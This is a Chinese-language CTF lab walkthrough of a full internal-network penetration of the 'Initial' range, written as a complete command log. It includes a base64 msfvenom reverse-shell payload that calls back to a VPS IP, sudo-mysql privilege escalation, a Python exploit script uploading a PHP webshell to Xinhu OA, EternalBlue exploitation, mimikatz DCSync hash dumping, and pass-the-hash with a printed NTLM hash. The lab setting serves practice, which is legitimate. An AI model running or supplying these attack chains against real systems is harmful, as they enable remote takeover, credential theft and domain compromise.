春秋云镜initial详解全过程，完整命令

引用

https://blog.csdn.net/uuzeray/article/details/141316323

https://9anux.org/2024/08/01/春秋云境Initial详解/index.html

环境&工具

ubuntu系统vps

安装msf，frp，fscan

本机

安装thinkphp莲花，蚁剑

flag01

访问ip发现是thinkphp服务

用莲花工具一把梭

蚁剑连接

读/root目录需要提权

suid没有可利用的权限命令，打sudo提权

这里显示mysql，说明当前用户可以root身份执行mysql命令

先查flag位置

sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'

再读文件

sudo mysql -e '\! cat /root/flag/flag01.txt'

第一个flag

flag{60b53231-

flag02

msf反弹shell

vps先监听端口

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 你的公网IP或内网IP   # ← 必须改！如 192.168.1.100 或 47.92.x.x
set LPORT 6666
exploit

生成反弹的base64字符串用于靶机执行

 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.109.49.107 LPORT=6666 -f elf | base64 -w 0

f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==

复制到靶机执行

sudo mysql -e '\! echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==" | base64 -d > /tmp/.X; chmod +x /tmp/.X; /tmp/.X &'

上传fscan扫内网服务

先获取一下当前ip

然后扫一下服务

扫描结果

172.22.1.2   DC域控
172.22.1.21  MS17-010永恒之蓝
172.22.1.18?m=login  信呼OA系统

frp做一下内网穿透

https://pic1.imgdb.cn/item/694a08a112468c0fdca41a67.png

frpc.toml细节

serverAddr = "vps的ip"
serverPort = 7000

[[proxies]]
name = "web_test"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 8081

用exp打信呼OA

import requests
import json

session = requests.Session()
session.verify = False
session.headers.update({
    "User-Agent": "Mozilla/5.0"
})

url_pre = "http://47.109.49.107:8081"

# 1. 登录
login_url = url_pre + "/?a=check&m=login&d=&ajaxbool=true"

login_data = {
    "rempass": "0",
    "jmpass": "false",
    "device": "1625884034525",
    "ltype": "0",
    "adminuser": "YWRtaW4=::",      # admin
    "adminpass": "YWRtaW4xMjM=",    # admin123
    "yanzm": ""
}

r = session.post(login_url, data=login_data)
print("\n[+] Login status:", r.status_code)
print("[+] Login response:")
print(r.text)

# 如果这里不是 JSON，基本直接结束
try:
    login_json = r.json()
except:
    print("[-] Login did not return JSON, stop.")
    exit()

# 2. 上传
upload_url = url_pre + "/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true"

files = {
    # 有些 CMS 叫 file，有些叫 filedata，你可以两个都试
    "file": ("1.php", open("1.php", "rb"), "image/jpeg")
}

r = session.post(upload_url, files=files)
print("\n[+] Upload status:", r.status_code)
print("[+] Upload headers:", r.headers.get("Content-Type"))
print("[+] Upload response:")
print(r.text)

# 强制解析 JSON
try:
    upload_json = r.json()
except:
    print("[-] Upload did not return JSON, stop.")
    exit()

print("[+] Upload JSON keys:", upload_json.keys())

# 常见字段兜底提取
file_id = upload_json.get("id") or upload_json.get("fileid")
filepath = upload_json.get("filepath") or upload_json.get("path")

print("[+] file_id:", file_id)
print("[+] filepath:", filepath)

if not file_id:
    print("[-] No file_id, cannot continue")
    exit()

# 3. 触发 task.php
task_url = url_pre + f"/task.php?m=qcloudCos|runt&a=run&fileid={file_id}"

r = session.get(task_url)
print("\n[+] Task trigger status:", r.status_code)
print("[+] Task response:")
print(r.text)

# 4. 如果你想直接访问文件（有些环境不需要 task）
if filepath:
    if ".uptemp" in filepath:
        filepath = "/" + filepath.split(".uptemp")[0] + ".php"
    elif not filepath.startswith("/"):
        filepath = "/" + filepath

    shell_url = url_pre + filepath
    print("\n[+] Try access uploaded file:")
    print(shell_url)

    r = session.get(shell_url)
    print("[+] Shell access response:")
    print(r.text)

用ai改的脚本打，原来的不知道为什么打不了

蚁剑连接

这个路径我也没找到，看的解析。

flag02: 2ce3-4813-87d4-

flag03

先打一开始被扫到的永恒之蓝

SOCKS 只能代理"我主动连别人"

FRP / 转发 才能让"别人连我"

# 1. 转到后台
background

# 2. 使用 EternalBlue 漏洞利用模块
use exploit/windows/smb/ms17_010_eternalblue

# 3. 设置攻击目标 IP
set RHOSTS 172.22.1.21

# 4. 设置载荷为 bind_tcp_uuid（绑定型，便于后续连接）
set payload windows/x64/meterpreter/bind_tcp_uuid

# 5. 执行漏洞利用
exploit

打完永恒之蓝打域控

先获取密钥

load kiwi

Loading extension kiwi... 
.#####.  
mimikatz 2.2.0 20191125 (x64/windows)  
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)  
## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)  
## \ / ##      > http://blog.gentilkiwi.com/mimikatz  
 '## v ##'   Vincent LE TOUX (vincent.letoux@gmail.com)  
 '#####'     > http://pingcastle.com / http://mysmartlogon.com  
 ***/  
Success.

然后执行DCSync，目标是拿到：Administrator 的 NTLM hash或任意 Domain Admin

kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

然后打PTH

use exploit/windows/smb/psexec

set RHOSTS 172.22.1.2
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:10cf89a850fb1cdbe6bb432b859164c8
set SMBDomain xiaorang.lab

set PAYLOAD windows/x64/meterpreter/bind_tcp

exploit

more C:\Users\Administrator\flag\flag03.txt

flag03: e8f88d0d43d6}

总结&收获

内网的基本结构，域概念

frp内网穿透

msf基本使用

内网渗透基本流程